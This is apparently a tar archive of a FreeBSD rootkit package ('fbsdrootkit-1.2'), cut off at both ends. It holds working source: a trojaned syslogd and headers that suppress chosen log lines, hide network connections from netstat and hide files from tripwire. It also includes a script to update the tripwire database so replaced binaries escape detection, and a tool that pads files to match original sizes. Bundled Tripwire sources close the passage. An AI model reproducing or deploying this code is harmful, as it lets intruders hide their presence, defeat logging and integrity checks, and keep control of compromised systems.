16; msglen -= 16; } /* skip leading blanks */ while(isspace(*msg)) { msg++; msglen--; } /* extract facility and priority level */ if (flags & MARK) fac = LOG_NFACILITIES; else fac = LOG_FAC(pri); prilev = LOG_PRI(pri); /* extract program name */ for(i = 0; i < NAME_MAX; i++) { if(!isalnum(msg[i])) break; prog[i] = msg[i]; } prog[i] = 0; /* log the message to the particular outputs */ if (!Initialized) { f = &consfile; f->f_file = open(ctty, O_WRONLY, 0); if (f->f_file >= 0) { fprintlog(f, flags, msg); (void)close(f->f_file); } (void)sigsetmask(omask); return; } for (f = Files; f; f = f->f_next) { /* skip messages that are incorrect priority */ if (f->f_pmask[fac] < prilev || f->f_pmask[fac] == INTERNAL_NOPRI) continue; /* skip messages with the incorrect program name */ if(f->f_program) if(strcmp(prog, f->f_program) != 0) continue; if (f->f_type == F_CONSOLE && (flags & IGN_CONS)) continue; /* don't output marks to recently written files */ if ((flags & MARK) && (now - f->f_time) < MarkInterval / 2) continue; /* * suppress duplicate lines to this file */ if ((flags & MARK) == 0 && msglen == f->f_prevlen && !strcmp(msg, f->f_prevline) && !strcmp(from, f->f_prevhost)) { (void)strncpy(f->f_lasttime, timestamp, 15); f->f_prevcount++; dprintf("msg repeated %d times, %ld sec of %d\n", f->f_prevcount, now - f->f_time, repeatinterval[f->f_repeatcount]); /* * If domark would have logged this by now, * flush it now (so we don't hold isolated messages), * but back off so we'll flush less often * in the future. */ if (now > REPEATTIME(f)) { fprintlog(f, flags, (char *)NULL); BACKOFF(f); } } else { /* new line, save it */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); f->f_repeatcount = 0; (void)strncpy(f->f_lasttime, timestamp, 15); (void)strncpy(f->f_prevhost, from, sizeof(f->f_prevhost)); if (msglen < MAXSVLINE) { f->f_prevlen = msglen; f->f_prevpri = pri; (void)strcpy(f->f_prevline, msg); fprintlog(f, flags, (char *)NULL); } else { f->f_prevline[0] = 0; f->f_prevlen = 0; fprintlog(f, flags, msg); } } } (void)sigsetmask(omask); } void fprintlog(f, flags, msg) struct filed *f; int flags; char *msg; { struct iovec iov[6]; struct iovec *v; int l; char line[MAXLINE + 1], repbuf[80], greetings[200]; v = iov; if (f->f_type == F_WALL) { v->iov_base = greetings; v->iov_len = sprintf(greetings, "\r\n\7Message from syslogd@%s at %.24s ...\r\n", f->f_prevhost, ctime(&now)); v++; v->iov_base = ""; v->iov_len = 0; v++; } else { v->iov_base = f->f_lasttime; v->iov_len = 15; v++; v->iov_base = " "; v->iov_len = 1; v++; } v->iov_base = f->f_prevhost; v->iov_len = strlen(v->iov_base); v++; v->iov_base = " "; v->iov_len = 1; v++; if (msg) { v->iov_base = msg; v->iov_len = strlen(msg); } else if (f->f_prevcount > 1) { v->iov_base = repbuf; v->iov_len = sprintf(repbuf, "last message repeated %d times", f->f_prevcount); } else { v->iov_base = f->f_prevline; v->iov_len = f->f_prevlen; } v++; dprintf("Logging to %s", TypeNames[f->f_type]); f->f_time = now; switch (f->f_type) { case F_UNUSED: dprintf("\n"); break; case F_FORW: dprintf(" %s\n", f->f_un.f_forw.f_hname); l = sprintf(line, "<%d>%.15s %s", f->f_prevpri, iov[0].iov_base, iov[4].iov_base); if (l > MAXLINE) l = MAXLINE; if (sendto(finet, line, l, 0, (struct sockaddr *)&f->f_un.f_forw.f_addr, sizeof(f->f_un.f_forw.f_addr)) != l) { int e = errno; (void)close(f->f_file); f->f_type = F_UNUSED; errno = e; logerror("sendto"); } break; case F_CONSOLE: if (flags & IGN_CONS) { dprintf(" (ignored)\n"); break; } /* FALLTHROUGH */ case F_TTY: case F_FILE: dprintf(" %s\n", f->f_un.f_fname); if (f->f_type != F_FILE) { v->iov_base = "\r\n"; v->iov_len = 2; } else { v->iov_base = "\n"; v->iov_len = 1; } again: if (writev(f->f_file, iov, 6) < 0) { int e = errno; (void)close(f->f_file); /* * Check for errors on TTY's due to loss of tty */ if ((e == EIO || e == EBADF) && f->f_type != F_FILE) { f->f_file = open(f->f_un.f_fname, O_WRONLY|O_APPEND, 0); if (f->f_file < 0) { f->f_type = F_UNUSED; logerror(f->f_un.f_fname); } else goto again; } else { f->f_type = F_UNUSED; errno = e; logerror(f->f_un.f_fname); } } else if (flags & SYNC_FILE) (void)fsync(f->f_file); break; case F_USERS: case F_WALL: dprintf("\n"); v->iov_base = "\r\n"; v->iov_len = 2; wallmsg(f, iov); break; } f->f_prevcount = 0; } /* * WALLMSG -- Write a message to the world at large * * Write the specified message to either the entire * world, or a list of approved users. */ void wallmsg(f, iov) struct filed *f; struct iovec *iov; { static int reenter; /* avoid calling ourselves */ FILE *uf; struct utmp ut; int i; char *p; char line[sizeof(ut.ut_line) + 1]; if (reenter++) return; if ((uf = fopen(_PATH_UTMP, "r")) == NULL) { logerror(_PATH_UTMP); reenter = 0; return; } /* NOSTRICT */ while (fread((char *)&ut, sizeof(ut), 1, uf) == 1) { if (ut.ut_name[0] == '\0') continue; strncpy(line, ut.ut_line, sizeof(ut.ut_line)); line[sizeof(ut.ut_line)] = '\0'; if (f->f_type == F_WALL) { if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) { errno = 0; /* already in msg */ logerror(p); } continue; } /* should we send the message to this user? */ for (i = 0; i < MAXUNAMES; i++) { if (!f->f_un.f_uname[i][0]) break; if (!strncmp(f->f_un.f_uname[i], ut.ut_name, UT_NAMESIZE)) { if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) { errno = 0; /* already in msg */ logerror(p); } break; } } } (void)fclose(uf); reenter = 0; } void reapchild(signo) int signo; { union wait status; while (wait3((int *)&status, WNOHANG, (struct rusage *)NULL) > 0) ; } /* * Return a printable representation of a host address. */ char * cvthname(f) struct sockaddr_in *f; { struct hostent *hp; char *p; dprintf("cvthname(%s)\n", inet_ntoa(f->sin_addr)); if (f->sin_family != AF_INET) { dprintf("Malformed from address\n"); return ("???"); } hp = gethostbyaddr((char *)&f->sin_addr, sizeof(struct in_addr), f->sin_family); if (hp == 0) { dprintf("Host name for your address (%s) unknown\n", inet_ntoa(f->sin_addr)); return (inet_ntoa(f->sin_addr)); } if ((p = strchr(hp->h_name, '.')) && strcmp(p + 1, LocalDomain) == 0) *p = '\0'; return (hp->h_name); } void domark(signo) int signo; { struct filed *f; now = time((time_t *)NULL); MarkSeq += TIMERINTVL; if (MarkSeq >= MarkInterval) { logmsg(LOG_INFO, "-- MARK --", LocalHostName, ADDDATE|MARK); MarkSeq = 0; } for (f = Files; f; f = f->f_next) { if (f->f_prevcount && now >= REPEATTIME(f)) { dprintf("flush %s: repeated %d times, %d sec.\n", TypeNames[f->f_type], f->f_prevcount, repeatinterval[f->f_repeatcount]); fprintlog(f, 0, (char *)NULL); BACKOFF(f); } } (void)alarm(TIMERINTVL); } /* * Print syslogd errors some place. */ void logerror(type) char *type; { char buf[100]; if (errno) (void)snprintf(buf, sizeof(buf), "syslogd: %s: %s", type, strerror(errno)); else (void)snprintf(buf, sizeof(buf), "syslogd: %s", type); errno = 0; dprintf("%s\n", buf); logmsg(LOG_SYSLOG|LOG_ERR, buf, LocalHostName, ADDDATE); } void die(signo) int signo; { struct filed *f; char buf[100]; for (f = Files; f != NULL; f = f->f_next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); } if (signo) { dprintf("syslogd: exiting on signal %d\n", signo); (void)sprintf(buf, "exiting on signal %d", signo); errno = 0; logerror(buf); } (void)unlink(LogName); exit(0); } /* * INIT -- Initialize syslogd from configuration table */ void init(signo) int signo; { int i; FILE *cf; struct filed *f, *next, **nextp; char *p; char cline[LINE_MAX]; char prog[NAME_MAX+1]; dprintf("init\n"); /* * Close all open log files. */ Initialized = 0; for (f = Files; f != NULL; f = next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: case F_FORW: (void)close(f->f_file); break; } next = f->f_next; if(f->f_program) free(f->f_program); free((char *)f); } Files = NULL; nextp = &Files; /* open the configuration file */ if ((cf = fopen(ConfFile, "r")) == NULL) { dprintf("cannot open %s\n", ConfFile); *nextp = (struct filed *)calloc(1, sizeof(*f)); cfline("*.ERR\t/dev/console", *nextp, "*"); (*nextp)->f_next = (struct filed *)calloc(1, sizeof(*f)); cfline("*.PANIC\t*", (*nextp)->f_next, "*"); Initialized = 1; return; } /* * Foreach line in the conf table, open that file. */ f = NULL; strcpy(prog, "*"); while (fgets(cline, sizeof(cline), cf) != NULL) { /* * check for end-of-section, comments, strip off trailing * spaces and newline character. #!prog is treated specially: * following lines apply only to that program. */ for (p = cline; isspace(*p); ++p) continue; if (*p == 0) continue; if(*p == '#') { p++; if(*p!='!') continue; } if(*p=='!') { p++; while(isspace(*p)) p++; if(!*p) { strcpy(prog, "*"); continue; } for(i = 0; i < NAME_MAX; i++) { if(!isalnum(p[i])) break; prog[i] = p[i]; } prog[i] = 0; continue; } for (p = strchr(cline, '\0'); isspace(*--p);) continue; *++p = '\0'; f = (struct filed *)calloc(1, sizeof(*f)); *nextp = f; nextp = &f->f_next; cfline(cline, f, prog); } /* close the configuration file */ (void)fclose(cf); Initialized = 1; if (Debug) { for (f = Files; f; f = f->f_next) { for (i = 0; i <= LOG_NFACILITIES; i++) if (f->f_pmask[i] == INTERNAL_NOPRI) printf("X "); else printf("%d ", f->f_pmask[i]); printf("%s: ", TypeNames[f->f_type]); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: printf("%s", f->f_un.f_fname); break; case F_FORW: printf("%s", f->f_un.f_forw.f_hname); break; case F_USERS: for (i = 0; i < MAXUNAMES && *f->f_un.f_uname[i]; i++) printf("%s, ", f->f_un.f_uname[i]); break; } if(f->f_program) { printf(" (%s)", f->f_program); } printf("\n"); } } logmsg(LOG_SYSLOG|LOG_INFO, "syslogd: restart", LocalHostName, ADDDATE); dprintf("syslogd: restarted\n"); } /* * Crack a configuration file line */ void cfline(line, f, prog) char *line; struct filed *f; char *prog; { struct hostent *hp; int i, pri; char *bp, *p, *q; char buf[MAXLINE], ebuf[100]; dprintf("cfline(\"%s\", f, \"%s\")\n", line, prog); errno = 0; /* keep strerror() stuff out of logerror messages */ /* clear out file entry */ memset(f, 0, sizeof(*f)); for (i = 0; i <= LOG_NFACILITIES; i++) f->f_pmask[i] = INTERNAL_NOPRI; /* save program name if any */ if(prog && *prog=='*') prog = NULL; if(prog) { f->f_program = calloc(1, strlen(prog)+1); if(f->f_program) { strcpy(f->f_program, prog); } } /* scan through the list of selectors */ for (p = line; *p && *p != '\t';) { /* find the end of this facility name list */ for (q = p; *q && *q != '\t' && *q++ != '.'; ) continue; /* collect priority name */ for (bp = buf; *q && !strchr("\t,;", *q); ) *bp++ = *q++; *bp = '\0'; /* skip cruft */ while (strchr(", ;", *q)) q++; /* decode priority name */ if (*buf == '*') pri = LOG_PRIMASK + 1; else { pri = decode(buf, prioritynames); if (pri < 0) { (void)sprintf(ebuf, "unknown priority name \"%s\"", buf); logerror(ebuf); return; } } /* scan facilities */ while (*p && !strchr("\t.;", *p)) { for (bp = buf; *p && !strchr("\t,;.", *p); ) *bp++ = *p++; *bp = '\0'; if (*buf == '*') for (i = 0; i < LOG_NFACILITIES; i++) f->f_pmask[i] = pri; else { i = decode(buf, facilitynames); if (i < 0) { (void)sprintf(ebuf, "unknown facility name \"%s\"", buf); logerror(ebuf); return; } f->f_pmask[i >> 3] = pri; } while (*p == ',' || *p == ' ') p++; } p = q; } /* skip to action part */ while (*p == '\t') p++; switch (*p) { case '@': if (!InetInuse) break; (void)strcpy(f->f_un.f_forw.f_hname, ++p); hp = gethostbyname(p); if (hp == NULL) { extern int h_errno; logerror(hstrerror(h_errno)); break; } memset(&f->f_un.f_forw.f_addr, 0, sizeof(f->f_un.f_forw.f_addr)); f->f_un.f_forw.f_addr.sin_family = AF_INET; f->f_un.f_forw.f_addr.sin_port = LogPort; memmove(&f->f_un.f_forw.f_addr.sin_addr, hp->h_addr, hp->h_length); f->f_type = F_FORW; break; case '/': (void)strcpy(f->f_un.f_fname, p); if ((f->f_file = open(p, O_WRONLY|O_APPEND, 0)) < 0) { f->f_file = F_UNUSED; logerror(p); break; } if (isatty(f->f_file)) f->f_type = F_TTY; else f->f_type = F_FILE; if (strcmp(p, ctty) == 0) f->f_type = F_CONSOLE; break; case '*': f->f_type = F_WALL; break; default: for (i = 0; i < MAXUNAMES && *p; i++) { for (q = p; *q && *q != ','; ) q++; (void)strncpy(f->f_un.f_uname[i], p, UT_NAMESIZE); if ((q - p) > UT_NAMESIZE) f->f_un.f_uname[i][UT_NAMESIZE] = '\0'; else f->f_un.f_uname[i][q - p] = '\0'; while (*q == ',' || *q == ' ') q++; p = q; } f->f_type = F_USERS; break; } } /* * Decode a symbolic name to a numeric value */ int decode(name, codetab) const char *name; CODE *codetab; { CODE *c; char *p, buf[40]; if (isdigit(*name)) return (atoi(name)); for (p = buf; *name && p < &buf[sizeof(buf) - 1]; p++, name++) { if (isupper(*name)) *p = tolower(*name); else *p = *name; } *p = '\0'; for (c = codetab; c->c_name; c++) if (!strcmp(buf, c->c_name)) return (c->c_val); return (-1); } fbsdrootkit-1.2/dotrip.sh100700 764 764 2355 6273037245 13006 0ustar dfdf#!/bin/sh # Simple script to avoid detection by tripwire. Modify to suit your needs. echo -n "Trying to guess the location of tripwire. . ." TRIPWIRE=`which tripwire` if [ ! -x $TRIPWIRE ]; then echo "Failed!" echo -n "Please enter a full path to tripwire: " while read TRIPWIRE; do if [ -x $TRIPWIRE ]; then echo "Ok." break else echo -n "That doesn't exist! Try again: " fi done else echo "Ok: $TRIPWIRE" fi echo -n "Trying to guess the location of the tripwire database. . ." DBPATH="/usr/adm/tcheck/databases/tw.db" if [ ! -f $DBPATH ]; then echo "Failed!" echo -n "Please enter the name of the database file: " while read DBPATH; do if [ -f $DBPATH ]; then echo "Ok." break else echo -n "That doesn't exist! Try again: " fi done else echo "Ok: $DBPATH" fi DONE=false while [ $DONE = "false" ]; do DONE=true echo -n "Is the database file read-only?[y(n)] " read ANSWER case $ANSWER in [yY] ) make tripwire-inst install.sh $TRIPWIRE exit 0 ;; [nN] ) break ;; * ) echo "Yes or No"\! DONE=false ;; esac done DBFILE=./databases/`basename $DBPATH` for BIN; do echo -n "Updating $BIN. . ." $TRIPWIRE -update $BIN mv $DBFILE $DBPATH echo "done." done echo "All done here chief!" fbsdrootkit-1.2/rootkitnetstat.h100600 764 764 4242 6257562154 14420 0ustar dfdf#define STR_SIZE 128 #define SPC_CHAR " " #define END_CHAR "\n" #define SHOWFLAG /* Able to list all with 'netstat -/' command */ #define BY_LADDR 1 #define BY_RADDR 2 #define BY_LPORT 3 #define BY_RPORT 4 #define BY_UNIX 5 struct h_st { struct h_st *next; int hack_type; char hack_cmd[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; char *strp; FILE *fp_hack; int showall; #ifdef MAIN_DOT_C inline addr_block_list() /* HACK read in maskfile */ { char FILENAME[10]; FILENAME[0]=ROOTKIT_HIDE_HOSTS[0]; FILENAME[1]=ROOTKIT_HIDE_HOSTS[1]; FILENAME[2]=ROOTKIT_HIDE_HOSTS[2]; FILENAME[3]=ROOTKIT_HIDE_HOSTS[3]; FILENAME[4]=ROOTKIT_HIDE_HOSTS[4]; FILENAME[5]=ROOTKIT_HIDE_HOSTS[5]; FILENAME[6]=ROOTKIT_HIDE_HOSTS[6]; FILENAME[7]=ROOTKIT_HIDE_HOSTS[7]; FILENAME[8]=ROOTKIT_HIDE_HOSTS[8]; FILENAME[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen (FILENAME, "r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strp=tmp_str; strp=strtok(strp, SPC_CHAR); h_tmp->hack_type=atoi(strp); strp=strtok('\0', END_CHAR); strcpy(h_tmp->hack_cmd, strp); h_tmp=h_tmp->next; } fclose(fp_hack); } h_tmp->next=NULL; } #endif #ifdef INET_DOT_C inline int check_inet(struct inpcb the_net) { int hide=0; for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) { switch(h_tmp->hack_type) { case BY_LADDR: if(strstr(inet_ntoa(the_net.inp_laddr),h_tmp->hack_cmd)) hide=1; break; case BY_RADDR: if(strstr(inet_ntoa(the_net.inp_faddr),h_tmp->hack_cmd)) hide=1; break; case BY_LPORT: if(the_net.inp_lport==atoi(h_tmp->hack_cmd)) hide=1; break; case BY_RPORT: if(the_net.inp_fport==atoi(h_tmp->hack_cmd)) hide=1; break; } } return(hide); } #endif #ifdef UNIX_DOT_C inline int check_unix(char *path) { int hide=0; /* ira BEGIN */ for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) { switch(h_tmp->hack_type) { case BY_UNIX: if(strstr(path, h_tmp->hack_cmd)) hide=1; break; } } return(hide); } #endif fbsdrootkit-1.2/rootkitsyslogd.h100600 764 764 2374 6257562237 14430 0ustar dfdf#define STR_SIZE 128 struct h_st { struct h_st *next; char logstr[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; FILE *fp_hack; int showall=0; inline log_block_list() { char FILENAME[10]; FILENAME[0]=ROOTKIT_HIDE_LOG[0]; FILENAME[1]=ROOTKIT_HIDE_LOG[1]; FILENAME[2]=ROOTKIT_HIDE_LOG[2]; FILENAME[3]=ROOTKIT_HIDE_LOG[3]; FILENAME[4]=ROOTKIT_HIDE_LOG[4]; FILENAME[5]=ROOTKIT_HIDE_LOG[5]; FILENAME[6]=ROOTKIT_HIDE_LOG[6]; FILENAME[7]=ROOTKIT_HIDE_LOG[7]; FILENAME[8]=ROOTKIT_HIDE_LOG[8]; FILENAME[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen(FILENAME, "r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strcpy(h_tmp->logstr, tmp_str); h_tmp->logstr[strlen(h_tmp->logstr)-1]='\0'; h_tmp=h_tmp->next; } fclose(fp_hack); } h_tmp->next=NULL; } inline int check_log(char *msg, char *from) { for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) if((strstr(msg, h_tmp->logstr))||(strstr(from, h_tmp->logstr))) return(1); return(0); } fbsdrootkit-1.2/addlen.c100600 764 764 1564 6265032641 12540 0ustar dfdf#include #include #include #include "rootkitutil.h" /* * Changes the length of a file by adding filler zero's to the end * * by Method */ main(int argc, char **argv) { int fd; long pos1,pos2,diff; char *buf; BASENAME(argv[0]); if(argc!=3) USAGE("original replacement") if((fd=open(argv[1],O_RDONLY))<0) ERR("open") pos1=lseek(fd,0,SEEK_END); close(fd); if((fd=open(argv[2],O_RDONLY))<0) ERR("open") pos2=lseek(fd,0,SEEK_END); close(fd); if((diff=pos2-pos1)<=0) { fprintf(stderr,"%s: %s is >= than %s, no changes made.\n",RK_PROG,argv[1],argv[2]); exit(1); } if((fd=open(argv[1],O_WRONLY|O_APPEND))<0) ERR("open") lseek(fd,0,SEEK_END); buf=(char *)malloc(diff); memset(buf,0x00,diff); if(write(fd,buf,diff)<0) ERR("write") printf("%s: wrote %d bytes to %s.\n",RK_PROG,diff,argv[1]); exit(0); } fbsdrootkit-1.2/dist.sh100700 764 764 73 6271317673 12407 0ustar dfdf#!/bin/sh DIR=`basename $PWD` cd .. tar cvfz $1.tgz $DIR fbsdrootkit-1.2/rootkittripwire.h100600 764 764 2022 6273034560 14566 0ustar dfdf#define STR_SIZE 128 struct h_st { struct h_st *next; char filename[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; FILE *fp_hack; inline file_block_list() { char TWCONF[10]; TWCONF[0]=ROOTKIT_HIDE_TRIP[0]; TWCONF[1]=ROOTKIT_HIDE_TRIP[1]; TWCONF[2]=ROOTKIT_HIDE_TRIP[2]; TWCONF[3]=ROOTKIT_HIDE_TRIP[3]; TWCONF[4]=ROOTKIT_HIDE_TRIP[4]; TWCONF[5]=ROOTKIT_HIDE_TRIP[5]; TWCONF[6]=ROOTKIT_HIDE_TRIP[6]; TWCONF[7]=ROOTKIT_HIDE_TRIP[7]; TWCONF[8]=ROOTKIT_HIDE_TRIP[8]; TWCONF[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen(TWCONF, "r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strcpy(h_tmp->filename, tmp_str); h_tmp->filename[strlen(h_tmp->filename)-1]='\0'; h_tmp=h_tmp->next; } } h_tmp->next=NULL; } inline int check_file(char *fpath) { for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) if(!strcmp(fpath, h_tmp->filename)) return(1); return(0); } fbsdrootkit-1.2/tripwire-1.2/ 40700 764 764 0 6273465340 13210 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/aux/ 40700 764 764 0 5630552013 13773 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/aux/Makefile100600 764 764 1143 5503640070 15531 0ustar dfdf# $Id: Makefile,v 1.8 1993/12/15 16:50:00 genek Exp $ # # Tripwire aux program build # BORDER = ../include/byteorder.h INODE = ../include/inode.h all: $(BORDER) $(INODE) $(BORDER): byteorder.c ntohl.h @echo "###" @echo "### Ignore warnings about shift count negative/too large on line 36" @echo "###" $(CC) $(CFLAGS) $(LDFLAGS) byteorder.c -o byteorder (./byteorder; cat ./ntohl.h) > $(BORDER) $(INODE): types.sh types.c types $(SHELL) ./types.sh "$(CPP)" > $(INODE) types: types.c $(CC) $(CFLAGS) $(LDFLAGS) types.c -o types clean: rm -f types byteorder *.o core ourtypes.h $(BORDER) $(INODE) fbsdrootkit-1.2/tripwire-1.2/aux/byteorder.c100600 764 764 2062 5611466314 16244 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: byteorder.c,v 1.5 1994/07/15 11:02:36 gkim Exp $"; #endif #include "../include/config.h" #include #ifdef STDLIBH #include #endif /* * byteorder.c * * lifted and hacked from Larry Wall's Configure program. * * Gene Kim * Purdue University * October 14, 1992 */ void header_print(); void main() { int i; union { uint32 l; char c[sizeof(int32)]; } u; /* print out machine-generated banner for .h file */ header_print(); if (sizeof(int32) > 4) u.l = (0x08070605L << 32) | 0x04030201L; else u.l = 0x04030201L; (void)printf("#define BYTEORDER 0x"); for (i=0; i < sizeof(int32); i++) (void)printf("%c",u.c[i]+'0'); (void)printf("\n"); exit(0); /*NOTREACHED*/ } void header_print() { printf("/*\n"); printf(" * byteorder.h\n"); printf(" *\n"); printf(" * Do not modify this file. This file was automatically \n"); printf(" * generated by the Tripwire makefile.\n"); printf(" *\n"); printf(" */\n"); printf("\n"); } fbsdrootkit-1.2/tripwire-1.2/aux/ntohl.h100600 764 764 1735 5611466315 15405 0ustar dfdf/* * It is a *bad* idea to call a private macro by * a well known name that is actually a function on * some architectures. So, I've prepended the * names with "bs_". * "bs" stands for "byte swapping"; No, really. */ #if BYTEORDER == 0x4321 #define bs_ntohl(x) #define bs_htonl(x) #else #if ((BYTEORDER - 0x1111) & 0x444) || !(BYTEORDER & 0xf) #define bs_ntohl(x) fatal("Unknown BYTEORDER\n") #define bs_htonl(x) fatal("Unknown BYTEORDER\n") #else #define BYTEREVERSE(x) {register unsigned char __t, \ *__c = (unsigned char *) &(x); \ __t = __c[3]; __c[3] = *__c; *__c++ = __t; \ __t = *__c; *__c = __c[1]; *++__c = __t; } #define bs_ntohl(x) BYTEREVERSE(x) #define bs_htonl(x) BYTEREVERSE(x) #endif #endif /* $Id: ntohl.h,v 1.3 1994/07/15 11:02:37 gkim Exp $ Then, wherever you use the value, replace: i = ntohl(j); -with- i = j; bs_ntohl(i); The resulting code will be faster that using a subroutine, especially if these routines are called often. --spaf */ fbsdrootkit-1.2/tripwire-1.2/aux/twconvert.c100600 764 764 4702 5502764523 16305 0ustar dfdf#include /* * twconvert * * convert v1.0 Tripwire databases to v1.1 * * Gene Kim * $Id: twconvert.c,v 1.1 1993/12/13 04:02:27 genek Exp $ */ void b64_convert(); void main() { /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, * st_uid, st_gid, st_size, * ltob64(statbuf->st_atime, vec64_a), * ltob64(statbuf->st_mtime, vec64_m), * ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 */ char s[2048], t[2048]; char filename[1024], entrynum[128], ignorevec[128], st_mode[128], st_ino[128], st_nlink[128], st_uid[128], st_gid[128], st_size[128], vec64[13][128]; int err, i; int linenumber = 0; while (fgets(s, sizeof(s), stdin) != NULL) { linenumber++; if (s[0] == '#' || s[0] == '@') { fputs(s, stdout); continue; } if ((err = sscanf(s, "%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s", filename, entrynum, ignorevec, st_mode, st_ino, st_nlink, st_uid, st_gid, st_size, vec64[0], vec64[1], vec64[2], vec64[3], vec64[4], vec64[5], vec64[6], vec64[7], vec64[8], vec64[9], vec64[10], vec64[11], vec64[12])) != 22) { fputs(s, stdout); continue; } /* convert */ b64_convert(ignorevec); for (i = 0; i < 13; i++) { b64_convert(vec64[i]); } sprintf(t, "%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s \n", filename, entrynum, ignorevec, st_mode, st_ino, st_nlink, st_uid, st_gid, st_size, vec64[0], vec64[1], vec64[2], vec64[3], vec64[4], vec64[5], vec64[6], vec64[7], vec64[8], vec64[9], vec64[10], vec64[11], vec64[12]); fputs(t, stdout); if (strlen(s) != strlen(t)) { fprintf(stderr, "strlens differ: old=%d, new=%d\n", strlen(s), strlen(t)); exit(1); } } exit(0); } static char new64vec[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:."; static char old64vec[] = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; void b64_convert(s) char *s; { int i; char *pc; char tmp[64]; if (strcmp(s, "0") == 0) { return; } strcpy(tmp, s); for (pc = s; *pc; pc++) { /* search old vector */ for (i = 0; i < 64; i++) { if (old64vec[i] == *pc) { *pc = new64vec[i]; break; } } } /* fprintf(stderr, "(%s) --> (%s)\n", tmp, s); */ } fbsdrootkit-1.2/tripwire-1.2/aux/types.c100600 764 764 3006 5502764523 15412 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: types.c,v 1.4 1993/12/13 04:02:27 genek Exp $"; #endif #include "../include/config.h" #include #include #include #ifdef STDLIBH #include #endif void typeis(); static void usage() { fputs("types: usage: typename\n", stderr); exit(1); } char *pc; int isunsigned; void main(argc, argv) int argc; char *argv[]; { struct stat statbuf; int size; pc = argv[1]; if (argc < 2) usage(); if (strcmp(pc, "mode_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_mode)); } else if (strcmp(pc, "ino_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_ino)); } else if (strcmp(pc, "nlink_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_nlink)); } else if (strcmp(pc, "uid_t") == 0) { isunsigned = 0; typeis(sizeof(statbuf.st_uid)); } else if (strcmp(pc, "gid_t") == 0) { isunsigned = 0; typeis(sizeof(statbuf.st_gid)); } else if (strcmp(pc, "off_t") == 0) { isunsigned = 1; typeis(sizeof(statbuf.st_size)); } exit(0); } void typeis(i) int i; { int shortlen = sizeof(unsigned short); int longlen = sizeof(unsigned long); char sign[64]; #ifdef ATT_3B2 /* ATT 3B2: Thanks Joe Sirrianni */ strcpy(sign, "unsigned"); #else if (isunsigned) strcpy(sign, "unsigned"); else strcpy(sign, "signed"); #endif if (i == shortlen) printf("typedef %s short %s;\n", sign, pc); else printf("typedef %s long %s;\n", sign, pc); } fbsdrootkit-1.2/tripwire-1.2/aux/types.sh100700 764 764 2271 5532334022 15574 0ustar dfdf#!/bin/sh # $Id: types.sh,v 1.3 1994/02/22 07:45:22 gkim Exp $ # types.sh # # glean any missing struct stat typedefs. # # Gene Kim # Purdue University # October 18, 1992 # this used to be a -x test, but Apollos can't process it! if test ! -f ./types then echo "You must do 'make' first!" exit 1 fi CPP=${1?"Run from the makefile!"} TYPES=./ourtypes.h # build our own local copy of types.h cat > gettypes.c << 'GHK' #include #include GHK $CPP gettypes.c > $TYPES rm -f gettypes.c # print out banner for inode.h cat << 'GHK' /* * inode.h * * Do not modify this file. This file was automatically * generated by the Tripwire makefile. * */ GHK # now start finding the missing typedefs grep mode_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types mode_t; fi grep ino_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types ino_t; fi grep nlink_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types nlink_t; fi grep uid_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types uid_t; fi grep gid_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types gid_t; fi grep off_t $TYPES > /dev/null if [ $? -ne 0 ] then ./types off_t; fi rm $TYPES exit 0; fbsdrootkit-1.2/tripwire-1.2/COAST.info100600 764 764 4231 5630546444 15036 0ustar dfdfTripwire is a product of the COAST group at Purdue. The COAST (Computer Operations, Audit, and Security Technology) project at Purdue is a multi-researcher, multi-project group focused on security tool development and technology transfer, education, network security, security evaluation and assurance, policy and protocol development, and incident response. We're trying to direct the majority of our attention to solutions to important problems in both present and future non-classified systems. We are particularly interested in collaboration with commercial and government entities with real-world problems we can try to solve. Our group includes faculty from CS and EE, and support from several outside sources. In addition to the faculty, several top students are working on COAST projects in 